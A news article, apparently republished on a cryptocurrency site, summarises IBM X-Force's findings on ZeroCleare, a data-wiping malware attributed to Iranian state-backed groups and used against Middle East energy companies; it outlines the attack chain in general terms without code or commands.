Iranian hackers deploy new ZeroCleare data-wiping malware

hdd destroyed
Image: Markus Spiske

Security researchers from IBM said today they identified a new strain of destructive data-wiping malware that was developed by Iranian state-sponsored hackers and deployed in cyber-attacks against energy companies active in the Middle East.

IBM did not name the companies that have been targeted and had data wiped in recent attacks.

Instead, IBM’s X-Force security team focused on analyzing the malware itself, which they named ZeroCleare.

A 28-page PDF report is available on the tool’s capabilities, which IBM said it closely resembles Shamoon, one of the most dangerous and destructive malware strains of the past decade. A summary of this report’s main findings is in the article below.

Created by xHunt and APT34

Unlike many cyber-security firms, IBM’s X-Force team did not shy away from attributing the malware and the attacks to a specific country — in this case, Iran.

“Based on the analysis of the malware and the attackers’ behavior, we suspect Iran-based nation-state adversaries were involved to develop and deploy this new wiper,” the IBM security team said.

But unlike many previous cyber-attacks, which are usually carried out by one single group, IBM said this malware and the attacks behind appear to be the efforts of a collaboration between two of Iran’s top-tier government-backed hacking units.

According to IBM, the ZeroCleare malware is the brainchild of xHunt (Hive0081 in the IBM report) and APT34 (ITG13 in the IBM report, also known as Oilrig).

The ZeroCleare malware

As for the malware itself, ZeroCleare is your classic “wiper,” a strain of malware designed to delete as much data as possible from an infected host.

Wiper malware is usually used in two scenarios. It’s either used to mask intrusions by deleting crucial forensic evidence or it’s used to damage a victim’s ability to carry out its normal business activity — as was the case of attacks like Shamoon, NotPetya, or Bad Rabbit.

While researching the recent ZeroCleare attacks, IBM said it identified two versions of the malware. One was created for 32-bit systems and a second for 64-bit systems. Of the two, IBM said that only the 64-bit version actually worked.

Researchers said that attacks usually began with the hackers executing brute-force attacks to gain access to weakly secured company network accounts.

Once they gained access to a company’s server account, they exploited a SharePoint vulnerability to install web shells like China Chopper and Tunna.

Once attackers had a foothold inside a company, they spread laterally inside the network to as many computers as possible, where they deployed ZeroCleare as the last step of their infection.

“To gain access to the device’s core, ZeroCleare used an intentionally vulnerable driver and malicious PowerShell/Batch scripts to bypass Windows controls,” IBM said.

Once ZeroCleare had elevated privileges on a host, it would load EldoS RawDisk, a legitimate toolkit for interacting with files, disks, and partitions.

The malware then abused this legitimate tool to “wipe the MBR and damage disk partitions on a large number of networked devices,” researchers said.



IBM researchers pointed out that recent versions of the notorious Shamoon malware, used as recent as last year, also abused the same Eldos RawDisk toolkit for its “destructive” behavior. Shamoon was, too, created and operated by Iranian hackers as well, but by a different group, known as APT33 (Hive0016). It is unclear if APT33 was involved in the creation of ZeroCleare. An initial version of the IBM report claimed that APT33 and APT34 had created ZeroCleare, but this was shortly updated to xHunt and APT34, shortly after publication, suggesting that attribution is not yet 100% clear.

Other artifacts and indicators of compromise detailed in IBM’s report tied ZeroCleare to xHunt and APT34.

Attacks happened this fall, were “targeted”

While IBM didn’t share any details about ZeroCleare victims, an IBM daily threat assessment sent this fall suggests IBM first learned of this new malware and attacks around September 20.

IBM said that none of the ZeroCleare attacks were opportunistic and appeared to be targeted against very specific organizations.

Past Shamoon attacks targeted companies in the energy sector that were active in the Middle East region, companies that were either Saudi-based or known partners for Saudi-based oil & gas enterprises.

Article updated two hours after publication to replace the name of one hacking group from APT33 to xHunt after IBM corrected its own report.

About the author

E-Crypto News was developed to assist all cryptocurrency investors in developing profitable cryptocurrency portfolios through the provision of timely and much-needed information. Investments in cryptocurrency require a level of detail, sensitivity, and accuracy that isn’t required in any other market and as such, we’ve developed our databases to help fill in information gaps.

Related Posts

E-Crypto News Executive Interviews

Crypto Scams

Beanstalk Farms Loses $80M In A Massive DeFi Governance Flash-Loan Hack
Beanstalk Farms Loses $80M In A Massive DeFi Governance Flash-Loan Hack
April 23, 2022
Joon Pak Head of Crypto at Prove talks to Us about Crypto Fraud And More
April 11, 2022
Mintable CEO Zach Burks Talks to Us about the Opensea Stolen NFTs and Their Recovery
March 21, 2022
Crypto Crime
Crypto Crime Surges To Record Highs As Thieves Follow Market Buzz – Chainalysis 2022 Report
February 24, 2022
Bots Circumvent 2FA Login At Coinbase And Other Crypto Exchanges In 2022
Bots Have Circumvented 2FA Logins At Coinbase And Other Crypto Exchanges In 2022
February 17, 2022

Automated trading with HaasBot Crypto Trading Bots

Blockchain/Cryptocurrency Questions and Answers

Roundtable Interview-What is the Effect of The Russia-Ukraine War on Cryptocurrency Prices?
March 4, 2022
How Does Bitcoin Casino Work + 2021 Beginner’s Guide
November 8, 2021
How to Buy and Sell Cryptocurrency
November 8, 2021
What Are Bitcoin Futures And How Will They Work In 2022?
November 4, 2021
The Unconventional Guide to Ethereum
October 28, 2021

CryptoCurrencyUSDChange 1hChange 24hChange 7d
Bitcoin28,863 0.02 % 2.52 % 5.00 %
Ethereum1,752.1 0.36 % 4.66 % 13.43 %
Tether1.002 0.19 % 0.15 % 0.14 %
USD Coin0.9989 0.16 % 0.08 % 0.04 %
BNB303.14 0.11 % 2.79 % 1.46 %
XRP0.3859 0.14 % 3.05 % 8.47 %
Binance USD1.003 0.29 % 0.01 % 0.02 %
Cardano0.9566 0.22 % 0.68 % 6.96 %
Solana42.05 0.62 % 5.78 % 19.66 %
Dogecoin0.08183 0.46 % 2.84 % 6.02 %

Bitcoin (BTC) $ 28,845.00
Ethereum (ETH) $ 1,752.05
Tether (USDT) $ 1.00
USD Coin (USDC) $ 1.00
BNB (BNB) $ 302.53
XRP (XRP) $ 0.385428
Binance USD (BUSD) $ 1.00
Cardano (ADA) $ 0.461264
Solana (SOL) $ 42.08
Dogecoin (DOGE) $ 0.08149